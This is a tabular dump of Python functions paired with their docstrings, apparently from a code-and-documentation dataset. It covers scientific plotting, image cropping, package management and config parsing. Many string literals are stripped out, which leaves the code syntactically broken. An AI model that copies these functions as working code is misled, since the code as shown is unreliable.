Unnamed: 0
int64 0
389k
| code
stringlengths 26
79.6k
| docstring
stringlengths 1
46.9k
|
---|---|---|
11,100 | def block_html(self, html):
if self.options.get() and \
html.lower().startswith():
return
if self.options.get():
return escape(html)
return html | Rendering block level pure html content.
:param html: text content of the html snippet. |
11,101 | def run_single_with_display(wf, display):
S = Scheduler(error_handler=display.error_handler)
W = Queue() \
>> branch(log_job_start.to(sink_map(display))) \
>> worker \
>> branch(sink_map(display))
return S.run(W, get_workflow(wf)) | Adds a display to the single runner. Everything still runs in a single
thread. Every time a job is pulled by the worker, a message goes to the
display routine; when the job is finished the result is sent to the display
routine. |
11,102 | def uncrop(data, crinfo, orig_shape, resize=False, outside_mode="constant", cval=0):
if crinfo is None:
crinfo = list(zip([0] * data.ndim, orig_shape))
elif np.asarray(crinfo).size == data.ndim:
crinfo = list(zip(crinfo, np.asarray(crinfo) + data.shape))
crinfo = fix_crinfo(crinfo)
data_out = np.ones(orig_shape, dtype=data.dtype) * cval
if resize:
data = resize_to_shape(data, crinfo[:, 1] - crinfo[:, 0])
startx = np.round(crinfo[0][0]).astype(int)
starty = np.round(crinfo[1][0]).astype(int)
startz = np.round(crinfo[2][0]).astype(int)
data_out[
startx : startx + data.shape[0],
starty : starty + data.shape[1],
startz : startz + data.shape[2],
] = data
if outside_mode == "nearest":
for ax in range(data.ndim):
start = np.round(crinfo[ax][0]).astype(int)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = start
repeated_slice = np.expand_dims(data_out[slices], ax)
append_sz = start
if append_sz > 0:
tile0 = np.repeat(repeated_slice, append_sz, axis=ax)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = slice(None, start)
data_out[slices] = tile0
start = np.round(crinfo[ax][0]).astype(int)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = start + data.shape[ax] - 1
repeated_slice = np.expand_dims(data_out[slices], ax)
append_sz = data_out.shape[ax] - (start + data.shape[ax])
if append_sz > 0:
tile0 = np.repeat(repeated_slice, append_sz, axis=ax)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = slice(start + data.shape[ax], None)
data_out[slices] = tile0
return data_out | Put some boundary to input image.
:param data: input data
:param crinfo: array with minimum and maximum index along each axis
[[minX, maxX],[minY, maxY],[minZ, maxZ]]. If crinfo is None, the whole input image is placed into [0, 0, 0].
If crinfo is just series of three numbers, it is used as an initial point for input image placement.
:param orig_shape: shape of uncropped image
:param resize: True or False (default). Usefull if the data.shape does not fit to crinfo shape.
:param outside_mode: 'constant', 'nearest'
:return: |
11,103 | def create_regular_expression(self, regexp):
for parameter in self.situation_context.situation_parameters:
if parameter.type == :
return self.add_parameter_value(
,
**{: parameter.href,
: regexp})
raise CreateElementFailed(
) | Create a regular expression for this inspection situation
context. The inspection situation must be using an inspection
context that supports regex.
:param str regexp: regular expression string
:raises CreateElementFailed: failed to modify the situation |
11,104 | def getfqdn(name=):
name = name.strip()
if not name or name == :
name = gethostname()
try:
hostname, aliases, ipaddrs = gethostbyaddr(name)
except error:
pass
else:
aliases.insert(0, hostname)
for name in aliases:
if in name:
break
else:
name = hostname
return name | Get fully qualified domain name from name.
An empty argument is interpreted as meaning the local host.
First the hostname returned by gethostbyaddr() is checked, then
possibly existing aliases. In case no FQDN is available, hostname
from gethostname() is returned. |
11,105 | def object(self, o_type, o_name=None):
o_found = self._get_object(o_type=o_type, o_name=o_name)
if not o_found:
return {: u, : u % o_type}
return o_found | Get an object from the scheduler.
The result is a serialized object which is a Json structure containing:
- content: the serialized object content
- __sys_python_module__: the python class of the returned object
The Alignak unserialize function of the alignak.misc.serialization package allows
to restore the initial object.
.. code-block:: python
from alignak.misc.serialization import unserialize
from alignak.objects.hostgroup import Hostgroup
raw_data = req.get("http://127.0.0.1:7768/object/hostgroup/allhosts")
print("Got: %s / %s" % (raw_data.status_code, raw_data.content))
assert raw_data.status_code == 200
object = raw_data.json()
group = unserialize(object, True)
assert group.__class__ == Hostgroup
assert group.get_name() == 'allhosts'
As an example:
{
"__sys_python_module__": "alignak.objects.hostgroup.Hostgroup",
"content": {
"uuid": "32248642-97dd-4f39-aaa2-5120112a765d",
"name": "",
"hostgroup_name": "allhosts",
"use": [],
"tags": [],
"alias": "All Hosts",
"notes": "",
"definition_order": 100,
"register": true,
"unknown_members": [],
"notes_url": "",
"action_url": "",
"imported_from": "unknown",
"conf_is_correct": true,
"configuration_errors": [],
"configuration_warnings": [],
"realm": "",
"downtimes": {},
"hostgroup_members": [],
"members": [
"553d47bc-27aa-426c-a664-49c4c0c4a249",
"f88093ca-e61b-43ff-a41e-613f7ad2cea2",
"df1e2e13-552d-43de-ad2a-fe80ad4ba979",
"d3d667dd-f583-4668-9f44-22ef3dcb53ad"
]
}
}
:param o_type: searched object type
:type o_type: str
:param o_name: searched object name (or uuid)
:type o_name: str
:return: serialized object information
:rtype: str |
11,106 | def add_mod(self, seq, mod):
modstr = self.value(mod)
if modstr == :
seq.parser_tree = parsing.Complement(seq.parser_tree)
elif modstr == :
seq.parser_tree = parsing.LookAhead(seq.parser_tree)
elif modstr == :
seq.parser_tree = parsing.Neg(seq.parser_tree)
elif modstr == :
seq.parser_tree = parsing.Until(seq.parser_tree)
return True | Create a tree.{Complement, LookAhead, Neg, Until} |
11,107 | def _setup_metric_group_values(self):
mg_defs = self._metrics_context.metric_group_definitions
metric_group_name = None
resource_uri = None
dt_timestamp = None
object_values = None
metric_group_values = list()
state = 0
for mr_line in self._metrics_response_str.splitlines():
if state == 0:
if object_values is not None:
mgv = MetricGroupValues(metric_group_name, object_values)
metric_group_values.append(mgv)
object_values = None
if mr_line == :
pass
else:
metric_group_name = mr_line.strip()
assert metric_group_name in mg_defs
m_defs = mg_defs[metric_group_name].metric_definitions
object_values = list()
state = 1
elif state == 1:
if mr_line == :
state = 0
else:
resource_uri = mr_line.strip()
state = 2
elif state == 2:
assert mr_line !=
try:
dt_timestamp = datetime_from_timestamp(int(mr_line))
except ValueError:
dt_timestamp = datetime.now(pytz.utc)
state = 3
elif state == 3:
if mr_line != :
str_values = mr_line.split()
metrics = dict()
for m_name in m_defs:
m_def = m_defs[m_name]
m_type = m_def.type
m_value_str = str_values[m_def.index]
m_value = _metric_value(m_value_str, m_type)
metrics[m_name] = m_value
ov = MetricObjectValues(
self._client, mg_defs[metric_group_name], resource_uri,
dt_timestamp, metrics)
object_values.append(ov)
else:
state = 1
return metric_group_values | Return the list of MetricGroupValues objects for this metrics response,
by processing its metrics response string.
The lines in the metrics response string are::
MetricsResponse: MetricsGroup{0,*}
<emptyline> a third empty line at the end
MetricsGroup: MetricsGroupName
ObjectValues{0,*}
<emptyline> a second empty line after each MG
ObjectValues: ObjectURI
Timestamp
ValueRow{1,*}
<emptyline> a first empty line after this blk |
11,108 | def project_from_files(
files, func_wrapper=_astroid_wrapper, project_name="no name", black_list=("CVS",)
):
astroid_manager = manager.AstroidManager()
project = Project(project_name)
for something in files:
if not os.path.exists(something):
fpath = modutils.file_from_modpath(something.split("."))
elif os.path.isdir(something):
fpath = os.path.join(something, "__init__.py")
else:
fpath = something
ast = func_wrapper(astroid_manager.ast_from_file, fpath)
if ast is None:
continue
project.path = project.path or ast.file
project.add_module(ast)
base_name = ast.name
if ast.package and something.find("__init__") == -1:
for fpath in modutils.get_module_files(
os.path.dirname(ast.file), black_list
):
ast = func_wrapper(astroid_manager.ast_from_file, fpath)
if ast is None or ast.name == base_name:
continue
project.add_module(ast)
return project | return a Project from a list of files or modules |
11,109 | def upload_file_handle(
self,
bucket: str,
key: str,
src_file_handle: typing.BinaryIO,
content_type: str=None,
metadata: dict=None):
raise NotImplementedError() | Saves the contents of a file handle as the contents of an object in a bucket. |
11,110 | def uninstall(self, package):
if isinstance(package, tuple):
package = .join(package)
if not self.is_installed(package):
self._write_to_log( % package)
return
try:
self._execute_pip([, , package])
except subprocess.CalledProcessError as e:
raise PackageRemovalException((e.returncode, e.output, package)) | Uninstalls the given package (given in pip's package syntax or a tuple of
('name', 'ver')) from this virtual environment. |
11,111 | def delete(args):
m = TemplateManager(args.hosts)
m.delete(args.name) | Delete a template by name |
11,112 | def _scatter_obs(
adata,
x=None,
y=None,
color=None,
use_raw=None,
layers=,
sort_order=True,
alpha=None,
basis=None,
groups=None,
components=None,
projection=,
legend_loc=,
legend_fontsize=None,
legend_fontweight=None,
color_map=None,
palette=None,
frameon=None,
right_margin=None,
left_margin=None,
size=None,
title=None,
show=None,
save=None,
ax=None):
sanitize_anndata(adata)
from scipy.sparse import issparse
if use_raw is None and adata.raw is not None: use_raw = True
if layers is None:
layers =
if isinstance(layers, str) and (layers == or layers in adata.layers.keys()):
layers = (layers, layers, layers)
elif isinstance(layers, (tuple, list)) and len(layers) == 3:
for layer in layers:
if layer not in adata.layers.keys() and layer != :
raise ValueError(
X\)
else:
raise ValueError()
if use_raw and (layers != (, , ) or layers != [, , ]):
ValueError(X\)
if legend_loc not in VALID_LEGENDLOCS:
raise ValueError(
.format(VALID_LEGENDLOCS))
if components is None: components = if in projection else
if isinstance(components, str): components = components.split()
components = np.array(components).astype(int) - 1
keys = [] if color is None else [color] if isinstance(color, str) else color
if title is not None and isinstance(title, str):
title = [title]
highlights = adata.uns[] if in adata.uns else []
if basis is not None:
try:
if basis == : components += 1
Y = adata.obsm[ + basis][:, components]
if basis == : components -= 1
except KeyError:
raise KeyError(
.format(basis))
elif x is not None and y is not None:
x_arr = adata._get_obs_array(x, use_raw=use_raw, layer=layers[0])
y_arr = adata._get_obs_array(y, use_raw=use_raw, layer=layers[1])
x_arr = x_arr.toarray().flatten() if issparse(x_arr) else x_arr
y_arr = y_arr.toarray().flatten() if issparse(y_arr) else y_arr
Y = np.c_[x_arr[:, None], y_arr[:, None]]
else:
raise ValueError()
if size is None:
n = Y.shape[0]
size = 120000 / n
if legend_loc.startswith() and legend_fontsize is None:
legend_fontsize = rcParams[]
elif legend_fontsize is None:
legend_fontsize = rcParams[]
palette_was_none = False
if palette is None: palette_was_none = True
if isinstance(palette, list):
if not is_color_like(palette[0]):
palettes = palette
else:
palettes = [palette]
else:
palettes = [palette for i in range(len(keys))]
for i, palette in enumerate(palettes):
palettes[i] = utils.default_palette(palette)
if basis is not None:
component_name = (
if basis ==
else if basis ==
else if basis ==
else if basis ==
else basis.replace(, ).upper() if in basis
else basis)
else:
component_name = None
axis_labels = (x, y) if component_name is None else None
show_ticks = True if component_name is None else False
color_ids = []
categoricals = []
colorbars = []
for ikey, key in enumerate(keys):
c =
categorical = False
colorbar = None
if key in adata.obs_keys():
if is_categorical_dtype(adata.obs[key]):
categorical = True
else:
c = adata.obs[key]
elif (use_raw
and adata.raw is not None
and key in adata.raw.var_names):
c = adata.raw[:, key].X
elif key in adata.var_names:
c = adata[:, key].X if layers[2] == else adata[:, key].layers[layers[2]]
c = c.toarray().flatten() if issparse(c) else c
elif is_color_like(key):
c = key
colorbar = False
else:
raise ValueError(
{}\
.format(key, adata.obs_keys(), adata.var_names))
if colorbar is None:
colorbar = not categorical
colorbars.append(colorbar)
if categorical: categoricals.append(ikey)
color_ids.append(c)
if right_margin is None and len(categoricals) > 0:
if legend_loc == : right_margin = 0.5
if title is None and keys[0] is not None:
title = [key.replace(, ) if not is_color_like(key) else for key in keys]
axs = scatter_base(Y,
title=title,
alpha=alpha,
component_name=component_name,
axis_labels=axis_labels,
component_indexnames=components + 1,
projection=projection,
colors=color_ids,
highlights=highlights,
colorbars=colorbars,
right_margin=right_margin,
left_margin=left_margin,
sizes=[size for c in keys],
color_map=color_map,
show_ticks=show_ticks,
ax=ax)
def add_centroid(centroids, name, Y, mask):
Y_mask = Y[mask]
if Y_mask.shape[0] == 0: return
median = np.median(Y_mask, axis=0)
i = np.argmin(np.sum(np.abs(Y_mask - median), axis=1))
centroids[name] = Y_mask[i]
for i, ikey in enumerate(categoricals):
palette = palettes[i]
key = keys[ikey]
utils.add_colors_for_categorical_sample_annotation(
adata, key, palette, force_update_colors=not palette_was_none)
mask_remaining = np.ones(Y.shape[0], dtype=bool)
centroids = {}
if groups is None:
for iname, name in enumerate(adata.obs[key].cat.categories):
if name not in settings.categories_to_ignore:
mask = scatter_group(axs[ikey], key, iname,
adata, Y, projection, size=size, alpha=alpha)
mask_remaining[mask] = False
if legend_loc.startswith(): add_centroid(centroids, name, Y, mask)
else:
groups = [groups] if isinstance(groups, str) else groups
for name in groups:
if name not in set(adata.obs[key].cat.categories):
raise ValueError( + name +
+
+ str(adata.obs[key].cat.categories))
else:
iname = np.flatnonzero(adata.obs[key].cat.categories.values == name)[0]
mask = scatter_group(axs[ikey], key, iname,
adata, Y, projection, size=size, alpha=alpha)
if legend_loc.startswith(): add_centroid(centroids, name, Y, mask)
mask_remaining[mask] = False
if mask_remaining.sum() > 0:
data = [Y[mask_remaining, 0], Y[mask_remaining, 1]]
if projection == : data.append(Y[mask_remaining, 2])
axs[ikey].scatter(*data, marker=, c=, s=size,
edgecolors=, zorder=-1)
legend = None
if legend_loc.startswith():
if legend_fontweight is None:
legend_fontweight =
for name, pos in centroids.items():
axs[ikey].text(pos[0], pos[1], name,
weight=legend_fontweight,
verticalalignment=,
horizontalalignment=,
fontsize=legend_fontsize)
all_pos = np.zeros((len(adata.obs[key].cat.categories), 2))
for iname, name in enumerate(adata.obs[key].cat.categories):
if name in centroids:
all_pos[iname] = centroids[name]
else:
all_pos[iname] = [np.nan, np.nan]
utils._tmp_cluster_pos = all_pos
if legend_loc == :
filename = settings.writedir +
logg.msg(.format(filename), v=1)
if settings.writedir != and not os.path.exists(settings.writedir):
os.makedirs(settings.writedir)
np.savetxt(filename, all_pos, delimiter=)
elif legend_loc == :
legend = axs[ikey].legend(
frameon=False, loc=,
bbox_to_anchor=(1, 0.5),
ncol=(1 if len(adata.obs[key].cat.categories) <= 14
else 2 if len(adata.obs[key].cat.categories) <= 30 else 3),
fontsize=legend_fontsize)
elif legend_loc != :
legend = axs[ikey].legend(
frameon=False, loc=legend_loc, fontsize=legend_fontsize)
if legend is not None:
for handle in legend.legendHandles: handle.set_sizes([300.0])
frameon = settings._frameon if frameon is None else frameon
if not frameon and x is None and y is None:
for ax in axs:
ax.set_xlabel()
ax.set_ylabel()
ax.set_frame_on(False)
utils.savefig_or_show( if basis is None else basis, show=show, save=save)
if show == False: return axs if len(keys) > 1 else axs[0] | See docstring of scatter. |
11,113 | def pkg_config_libdirs(packages):
if token.startswith("-L"):
libdirs.append(token[2:])
return libdirs | Returns a list of all library paths that pkg-config says should be included when
linking against the list of packages given as 'packages'. An empty return list means
that the package may be found in the standard system locations, irrespective of
pkg-config. |
11,114 | def children(self):
for c in self.table.columns:
if c.parent == self.name and not c.valuetype_class.is_label():
yield c | Return the table's other column that have this column as a parent, excluding labels |
11,115 | def format_lines(statements, lines):
pairs = []
i = 0
j = 0
start = None
statements = sorted(statements)
lines = sorted(lines)
while i < len(statements) and j < len(lines):
if statements[i] == lines[j]:
if start == None:
start = lines[j]
end = lines[j]
j += 1
elif start:
pairs.append((start, end))
start = None
i += 1
if start:
pairs.append((start, end))
ret = .join(map(nice_pair, pairs))
return ret | Nicely format a list of line numbers.
Format a list of line numbers for printing by coalescing groups of lines as
long as the lines represent consecutive statements. This will coalesce
even if there are gaps between statements.
For example, if `statements` is [1,2,3,4,5,10,11,12,13,14] and
`lines` is [1,2,5,10,11,13,14] then the result will be "1-2, 5-11, 13-14". |
11,116 | def stage_config(self):
def get_stage_setting(stage, extended_stages=None):
if extended_stages is None:
extended_stages = []
if stage in extended_stages:
raise RuntimeError(stage + " has already been extended to these settings. "
"There is a circular extends within the settings file.")
extended_stages.append(stage)
try:
stage_settings = dict(self.zappa_settings[stage].copy())
except KeyError:
raise ClickException("Cannot extend settings for undefined stage .")
extends_stage = self.zappa_settings[stage].get(, None)
if not extends_stage:
return stage_settings
extended_settings = get_stage_setting(stage=extends_stage, extended_stages=extended_stages)
extended_settings.update(stage_settings)
return extended_settings
settings = get_stage_setting(stage=self.api_stage)
if u in settings:
settings[u] = settings.get(u)
settings.update(self.stage_config_overrides)
return settings | A shortcut property for settings of a stage. |
11,117 | def _len_objid(self):
try:
return self._size
except AttributeError:
temp = (self.object_id, self.birth_vol_id, self.birth_object_id, self.birth_domain_id)
self._size = sum([ObjectID._UUID_SIZE for data in temp if data is not None])
return self._size | Get the actual size of the content, as some attributes have variable sizes |
11,118 | def _update_progress(self, percentage, **kwargs):
if self._show_progressbar:
if self._progressbar is None:
self._initialize_progressbar()
self._progressbar.update(percentage * 10000)
if self._progress_callback is not None:
self._progress_callback(percentage, **kwargs) | Update the progress with a percentage, including updating the progressbar as well as calling the progress
callback.
:param float percentage: Percentage of the progressbar. from 0.0 to 100.0.
:param kwargs: Other parameters that will be passed to the progress_callback handler.
:return: None |
11,119 | def create_channel(
self, name, values=None, *, shape=None, units=None, dtype=None, **kwargs
) -> Channel:
if name in self.channel_names:
warnings.warn(name, wt_exceptions.ObjectExistsWarning)
return self[name]
elif name in self.variable_names:
raise wt_exceptions.NameNotUniqueError(name)
require_kwargs = {"chunks": True}
if values is None:
if shape is None:
require_kwargs["shape"] = self.shape
else:
require_kwargs["shape"] = shape
if dtype is None:
require_kwargs["dtype"] = np.dtype(np.float64)
else:
require_kwargs["dtype"] = dtype
if require_kwargs["dtype"].kind in "fcmM":
require_kwargs["fillvalue"] = np.nan
else:
require_kwargs["fillvalue"] = 0
else:
require_kwargs["data"] = values
require_kwargs["shape"] = values.shape
require_kwargs["dtype"] = values.dtype
if np.prod(require_kwargs["shape"]) == 1:
require_kwargs["chunks"] = None
dataset_id = self.require_dataset(name=name, **require_kwargs).id
channel = Channel(self, dataset_id, units=units, **kwargs)
self.attrs["channel_names"] = np.append(self.attrs["channel_names"], name.encode())
return channel | Append a new channel.
Parameters
----------
name : string
Unique name for this channel.
values : array (optional)
Array. If None, an empty array equaling the data shape is
created. Default is None.
shape : tuple of int
Shape to use. Must broadcast with the full shape.
Only used if `values` is None.
Default is the full shape of self.
units : string (optional)
Channel units. Default is None.
dtype : numpy.dtype (optional)
dtype to use for dataset, default is np.float64.
Only used if `values` is None.
kwargs : dict
Additional keyword arguments passed to Channel instantiation.
Returns
-------
Channel
Created channel. |
11,120 | def choose(n, k):
if 0 <= k <= n:
ntok = 1
ktok = 1
for t in xrange(1, min(k, n - k) + 1):
ntok *= n
ktok *= t
n -= 1
return ntok // ktok
else:
return 0 | A fast way to calculate binomial coefficients by Andrew Dalke (contrib). |
11,121 | def added_env_paths(env_vars, env=None):
if not env_vars:
return None
if not env:
env = dict(os.environ)
result = dict(env)
for env_var, paths in env_vars.items():
separator = paths[0]
paths = paths[1:]
current = env.get(env_var, "")
current = [x for x in current.split(separator) if x]
added = 0
for path in paths.split(separator):
if path not in current:
added += 1
current.append(path)
if added:
result[env_var] = separator.join(current)
return result | :param dict|None env_vars: Env vars to customize
:param dict env: Original env vars |
11,122 | def connect_put_namespaced_service_proxy_with_path(self, name, namespace, path, **kwargs):
kwargs[] = True
if kwargs.get():
return self.connect_put_namespaced_service_proxy_with_path_with_http_info(name, namespace, path, **kwargs)
else:
(data) = self.connect_put_namespaced_service_proxy_with_path_with_http_info(name, namespace, path, **kwargs)
return data | connect_put_namespaced_service_proxy_with_path # noqa: E501
connect PUT requests to proxy of Service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_put_namespaced_service_proxy_with_path(name, namespace, path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the ServiceProxyOptions (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str path: path to the resource (required)
:param str path2: Path is the part of URLs that include service endpoints, suffixes, and parameters to use for the current proxy request to service. For example, the whole request URL is http://localhost/api/v1/namespaces/kube-system/services/elasticsearch-logging/_search?q=user:kimchy. Path is _search?q=user:kimchy.
:return: str
If the method is called asynchronously,
returns the request thread. |
11,123 | def role_exists(role, **kwargs):
return len(tsql_query(query=.format(role), as_dict=True, **kwargs)) == 1 | Checks if a role exists.
CLI Example:
.. code-block:: bash
salt minion mssql.role_exists db_owner |
11,124 | def list_authors():
authors = Author.query.all()
content =
for author in authors:
content += % author.name
return content | List all authors.
e.g.: GET /authors |
11,125 | def poisson_equation(image, gradient=1, max_iter=100, convergence=.01, percentile = 90.0):
pe = np.zeros((image.shape[0]+2, image.shape[1]+2))
if image.shape[0] > 64 and image.shape[1] > 64:
sub_image = image[::2, ::2]
sub_pe = poisson_equation(sub_image,
gradient=gradient*2,
max_iter=max_iter,
convergence=convergence)
coordinates = np.mgrid[0:(sub_pe.shape[0]*2),
0:(sub_pe.shape[1]*2)].astype(float) / 2
pe[1:(sub_image.shape[0]*2+1), 1:(sub_image.shape[1]*2+1)] = \
scind.map_coordinates(sub_pe, coordinates, order=1)
pe[:image.shape[0], :image.shape[1]][~image] = 0
else:
pe[1:-1,1:-1] = image
i, j = np.mgrid[0:pe.shape[0], 0:pe.shape[1]]
mask = (i>0) & (i<pe.shape[0]-1) & (j>0) & (j<pe.shape[1]-1)
mask[mask] = image[i[mask]-1, j[mask]-1]
i = i[mask]
j = j[mask]
if len(i) == 0:
return pe[1:-1, 1:-1]
if len(i) == 1:
pe[mask] = 1
return pe[1:-1, 1:-1]
for itr in range(max_iter):
next_pe = (pe[i+1, j] + pe[i-1, j] + pe[i, j+1] + pe[i, j-1]) / 4 + 1
difference = np.abs((pe[mask] - next_pe) / next_pe)
pe[mask] = next_pe
if np.percentile(difference, percentile) <= convergence:
break
return pe[1:-1, 1:-1] | Estimate the solution to the Poisson Equation
The Poisson Equation is the solution to gradient(x) = h^2/4 and, in this
context, we use a boundary condition where x is zero for background
pixels. Also, we set h^2/4 = 1 to indicate that each pixel is a distance
of 1 from its neighbors.
The estimation exits after max_iter iterations or if the given percentile
of foreground pixels differ by less than the convergence fraction
from one pass to the next.
Some ideas taken from Gorelick, "Shape representation and classification
using the Poisson Equation", IEEE Transactions on Pattern Analysis and
Machine Intelligence V28, # 12, 2006
image - binary image with foreground as True
gradient - the target gradient between 4-adjacent pixels
max_iter - maximum # of iterations at a given level
convergence - target fractional difference between values from previous
and next pass
percentile - measure convergence at this percentile |
11,126 | def apply_parameters(self, parameters):
class SafeString(object):
def __init__(self, s):
self.string = s
def __repr__(self):
return "{" + self.string + "}"
def __str__(self):
return "{" + self.string + "}"
def __getitem__(self, item):
return SafeString(self.string + "[" + item + "]")
class SafeDict(dict):
def __missing__(self, key):
return SafeString(key)
formatter = string.Formatter()
ds_formatter = string.Formatter()
def ds_format_field(value, spec):
ds_format_field.last = value
return ""
ds_formatter.format_field = ds_format_field
params = SafeDict(parameters)
def _recursive_apply(item):
if isinstance(item, basestring):
if item.startswith("{$REPLACE") and item.endswith("}"):
try:
ds_formatter.vformat("{" + item[10:-1] + "}", (), parameters)
except KeyError:
return None
return copy.deepcopy(ds_formatter.format_field.last)
else:
return formatter.vformat(item, (), params)
if isinstance(item, dict):
return {
_recursive_apply(key): _recursive_apply(value)
for key, value in item.items()
}
if isinstance(item, tuple):
return tuple(_recursive_apply(list(item)))
if isinstance(item, list):
return [_recursive_apply(x) for x in item]
return item
self.recipe = _recursive_apply(self.recipe) | Recursively apply dictionary entries in 'parameters' to {item}s in recipe
structure, leaving undefined {item}s as they are. A special case is a
{$REPLACE:item}, which replaces the string with a copy of the referenced
parameter item.
Examples:
parameters = { 'x':'5' }
apply_parameters( { '{x}': '{y}' }, parameters )
=> { '5': '{y}' }
parameters = { 'y':'5' }
apply_parameters( { '{x}': '{y}' }, parameters )
=> { '{x}': '5' }
parameters = { 'x':'3', 'y':'5' }
apply_parameters( { '{x}': '{y}' }, parameters )
=> { '3': '5' }
parameters = { 'l': [ 1, 2 ] }
apply_parameters( { 'x': '{$REPLACE:l}' }, parameters )
=> { 'x': [ 1, 2 ] } |
11,127 | def _compute_sources_for_target(self, target):
def resolve_target_sources(target_sources):
resolved_sources = []
for tgt in target_sources:
if tgt.has_sources():
resolved_sources.extend(tgt.sources_relative_to_buildroot())
return resolved_sources
sources = [s for s in target.sources_relative_to_buildroot() if self._sources_predicate(s)]
if hasattr(target, ) and target.java_sources:
sources.extend(resolve_target_sources(target.java_sources))
return sources | Computes and returns the sources (relative to buildroot) for the given target. |
11,128 | def from_string(string):
lines = list(clean_lines(string.splitlines()))
def input_mode(line):
if line[0] == "&":
return ("sections", line[1:].lower())
elif "ATOMIC_SPECIES" in line:
return ("pseudo", )
elif "K_POINTS" in line:
return ("kpoints", line.split("{")[1][:-1])
elif "CELL_PARAMETERS" in line or "ATOMIC_POSITIONS" in line:
return ("structure", line.split("{")[1][:-1])
elif line == "/":
return None
else:
return mode
sections = {"control": {}, "system": {}, "electrons": {},
"ions": {}, "cell":{}}
pseudo = {}
pseudo_index = 0
lattice = []
species = []
coords = []
structure = None
site_properties = {"pseudo":[]}
mode = None
for line in lines:
mode = input_mode(line)
if mode == None:
pass
elif mode[0] == "sections":
section = mode[1]
m = re.match(r, line)
if m:
key = m.group(1).strip()
key_ = m.group(2).strip()
val = m.group(3).strip()
if key_ != "":
if sections[section].get(key, None) == None:
val_ = [0.0]*20
val_[int(key_)-1] = PWInput.proc_val(key, val)
sections[section][key] = val_
site_properties[key] = []
else:
sections[section][key][int(key_)-1] = PWInput.proc_val(key, val)
else:
sections[section][key] = PWInput.proc_val(key, val)
elif mode[0] == "pseudo":
m = re.match(r, line)
if m:
pseudo[m.group(1).strip()] = {}
pseudo[m.group(1).strip()]["index"] = pseudo_index
pseudo[m.group(1).strip()]["pseudopot"] = m.group(3).strip()
pseudo_index += 1
elif mode[0] == "kpoints":
m = re.match(r, line)
if m:
kpoints_grid = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
kpoints_shift = (int(m.group(4)), int(m.group(5)), int(m.group(6)))
else:
kpoints_mode = mode[1]
elif mode[0] == "structure":
m_l = re.match(r, line)
m_p = re.match(r, line)
if m_l:
lattice += [ float(m_l.group(1)), float(m_l.group(2)), float(m_l.group(3)) ]
elif m_p:
site_properties["pseudo"].append(pseudo[m_p.group(1)]["pseudopot"])
species += [pseudo[m_p.group(1)]["pseudopot"].split(".")[0]]
coords += [[float(m_p.group(2)), float(m_p.group(3)), float(m_p.group(4))]]
for k, v in site_properties.items():
if k != "pseudo":
site_properties[k].append(sections[][k][pseudo[m_p.group(1)]["index"]])
if mode[1] == "angstrom":
coords_are_cartesian = True
elif mode[1] == "crystal":
coords_are_cartesian = False
structure = Structure(Lattice(lattice), species, coords,
coords_are_cartesian=coords_are_cartesian,
site_properties=site_properties)
return PWInput(structure=structure, control=sections["control"],
system=sections["system"], electrons=sections["electrons"],
ions=sections["ions"], cell=sections["cell"], kpoints_mode=kpoints_mode,
kpoints_grid=kpoints_grid, kpoints_shift=kpoints_shift) | Reads an PWInput object from a string.
Args:
string (str): PWInput string
Returns:
PWInput object |
11,129 | def _from_dict(cls, _dict):
args = {}
if in _dict:
args[] = WorkspaceSystemSettingsTooling._from_dict(
_dict.get())
if in _dict:
args[
] = WorkspaceSystemSettingsDisambiguation._from_dict(
_dict.get())
if in _dict:
args[] = _dict.get()
return cls(**args) | Initialize a WorkspaceSystemSettings object from a json dictionary. |
11,130 | def update_settings(self, settings, force=False, timeout=-1):
data = settings.copy()
if in data:
ethernet_default_values = self._get_default_values(self.SETTINGS_ETHERNET_DEFAULT_VALUES)
data[] = merge_resources(data[],
ethernet_default_values)
uri = "{}/settings".format(self.data["uri"])
default_values = self._get_default_values(self.SETTINGS_DEFAULT_VALUES)
data = self._helper.update_resource_fields(data, default_values)
return self._helper.update(data, uri=uri, force=force, timeout=timeout) | Updates interconnect settings on the logical interconnect. Changes to interconnect settings are asynchronously
applied to all managed interconnects.
(This method is not available from API version 600 onwards)
Args:
settings: Interconnect settings
force: If set to true, the operation completes despite any problems with network connectivity or errors
on the resource itself. The default is false.
timeout: Timeout in seconds. Wait for task completion by default. The timeout does not abort the operation
in OneView; it just stops waiting for its completion.
Returns:
dict: Logical Interconnect |
11,131 | def get_html_string(self, **kwargs):
options = self._get_options(kwargs)
if options["format"]:
string = self._get_formatted_html_string(options)
else:
string = self._get_simple_html_string(options)
return string | Return string representation of HTML formatted version of table in current state.
Arguments:
start - index of first data row to include in output
end - index of last data row to include in output PLUS ONE (list slice style)
fields - names of fields (columns) to include
header - print a header showing field names (True or False)
border - print a border around the table (True or False)
hrules - controls printing of horizontal rules after rows. Allowed values: ALL, FRAME, HEADER, NONE
vrules - controls printing of vertical rules between columns. Allowed values: FRAME, ALL, NONE
int_format - controls formatting of integer data
float_format - controls formatting of floating point data
padding_width - number of spaces on either side of column data (only used if left and right paddings are None)
left_padding_width - number of spaces on left hand side of column data
right_padding_width - number of spaces on right hand side of column data
sortby - name of field to sort rows by
sort_key - sorting key function, applied to data points before sorting
attributes - dictionary of name/value pairs to include as HTML attributes in the <table> tag
xhtml - print <br/> tags if True, <br> tags if false |
11,132 | def partial(self, *args):
def part(*args2):
args3 = args + args2
return self.obj(*args3)
return self._wrap(part) | Partially apply a function by creating a version that has had some of
its arguments pre-filled, without changing its dynamic `this` context. |
11,133 | def _CreateDatabase(self):
goodlogging.Log.Info("DB", "Initialising new database", verbosity=self.logVerbosity)
with sqlite3.connect(self._dbPath) as db:
db.execute("CREATE TABLE Config ("
"Name TEXT UNIQUE NOT NULL, "
"Value TEXT)")
db.execute("CREATE TABLE IgnoredDir ("
"DirName TEXT UNIQUE NOT NULL)")
db.execute("CREATE TABLE SupportedFormat ("
"FileFormat TEXT UNIQUE NOT NULL)")
db.execute("CREATE TABLE TVLibrary ("
"ShowID INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, "
"ShowName TEXT UNIQUE NOT NULL, "
"ShowDir TEXT UNIQUE)")
db.execute("CREATE TABLE FileName ("
